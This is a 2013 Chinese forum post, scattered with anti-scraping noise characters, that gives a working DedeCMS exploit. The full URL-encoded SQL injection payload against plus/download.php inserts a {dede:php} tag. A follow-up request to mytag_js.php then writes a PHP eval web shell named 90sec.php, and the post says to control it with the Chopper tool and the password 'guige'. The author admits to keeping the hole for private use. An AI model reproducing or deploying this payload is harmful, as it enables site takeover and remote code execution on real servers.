本帖最后由 土豆 于 2013-6-10 14:41 编辑
% O/ A& Y6 n. d- X; s: Y, ?1 r% ~- S0 F% L8 n- I
/ x) E4 w: N; |& i. w% I作者:鬼哥
( T' G( j: m' e* o; H- z0 e4 ]- F/ o/ B$ t2 M) H1 ~$ n6 T2 t. q
看贴不回,没JJ
4 p; u/ _+ |% S
0 B7 w! i$ p+ z- b. ]漏洞大家都知道是哪个。# w/ v ]+ h5 Q& ~( x+ k; d, i
* H5 Z2 @- `: ~* ~0 t0 H/ a* [5 B其实我一直在玩。。郁闷 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。
2 t$ j4 s7 F) A- i& Q2 H! {* F
, n& ^# L; r( |$ Z V. F. ]' o* H但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。
6 t: l6 x- w9 L; h7 p) ]) C2 q+ A" F7 ? `2 _
刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?! B: b g" e( @
6 u% i: f: E7 m( @' O
getshell 很容易 。 既然刚发出来的是 sql方法getshell 我也看到几个人发了sql增加表mytag的内容。
' U" p( o& ]8 i+ i* g O, C2 _$ k0 o6 T6 Y
但是测试了下。。失败
9 _( a& u* ?1 s: q5 Z, a5 k, Z
8 Q1 z3 Z( f/ Z# @. e9 ~原因: 用的语句是update 很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴 错误。。现在要做的饶过即可。以前也出过那么多dede sql 结合饶过,成功INSERT。$ c& o9 t! y# C: Q2 m4 j, L
% e& p: I# j+ W# v7 V6 Y$ D8 g1 a3 a
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'`0 R( }3 y2 B s# b9 O. M4 P# d' T' |
: y4 }6 f) V. ?8 B7 m
EXP:
2 i8 T& U9 [2 h. X' ]! P; I
% K. j0 b* [" @( I3 Dhttp://www.xxx.com/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96
: ~; l) L* d4 c8 v
9 r" Q4 j+ |# q0 z4 v7 r9 q( X- N4 d8 r8 [1 o
成功增加。
! K2 v5 z# K# M2 c" E9 M. v8 H5 k! G5 \0 z! k8 E
访问http://www.xxx.com/plus/mytag_js.php?aid=9013
! d7 t+ {) U8 N/ e( i6 p生成一句话木马.
; G0 C8 l# ~/ }1 L/ P% _! C菜刀连接 http://www.xxx.com/plus/90sec.php 密码 guige
4 o6 z3 ^4 A3 p% A# J5 v
7 O4 x8 K6 b. F测试OK。 2 O) F. M' {/ `5 x# f
8 G2 T- b4 }3 Q* T( Z
2 c5 |. U9 X$ O! V |
发表于 2013-6-10 16:49:18
收藏
支持
反对